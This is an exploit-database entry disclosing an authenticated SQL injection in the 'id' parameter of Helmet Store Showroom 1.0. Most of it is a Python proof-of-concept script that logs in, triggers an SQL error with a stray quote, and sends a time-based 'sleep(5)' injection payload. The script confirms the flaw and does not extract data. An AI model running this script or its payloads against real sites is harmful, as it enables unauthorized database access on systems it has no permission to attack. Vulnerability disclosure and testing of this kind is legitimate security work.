Helmet Store Showroom 1.0 SQL Injection

2022.11.26
Credit: syad
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Helmet Store Showroom 1.0 - authenticated SQL Injection # Date: 25-11-2022 # Exploit Author: syad # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: Windows 10 + XAMPP 3.2.4 # CVE ID : N/A # Description # The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection. import requests import sys import pyfiglet sess = requests.Session() proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"} def login1(ip,username,password): x = "http://%s/hss/classes/Login.php?f=login" % ip login = {'username':username, 'password':password} r = sess.post(x, data=login, proxies=proxies) #print(r.content) def login(ip): x = ("http://%s/hss/admin") % ip r = sess.get(x,proxies=proxies) if "Welcome to Helmet Store Showroom - PHP" in r.text: print("--------------------------------------------") print("[+] Success Login") def detect_sql(ip): x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip r = sess.get(x,proxies=proxies) if "You have an error in your SQL syntax" in r.text: print("[+] Found SQL Error") def time_based_sqli(ip): x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip r = sess.get(x,proxies=proxies) print("[+] Time Based SQL Found") print("[*]!!! Time To Report !!!") if __name__ == "__main__": result = pyfiglet.figlet_format("PWN") print(result) try: ip = sys.argv[1].strip() username = sys.argv[2].strip() password = sys.argv[3].strip() except IndexError: print("[-] Usage %s <ip> <username> <password>" % sys.argv[0]) print("[-] Example: %s 192.168.1.x" % sys.argv[0]) sys.exit(-1) login1(ip,username,password) login(ip) detect_sql(ip) time_based_sqli(ip)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top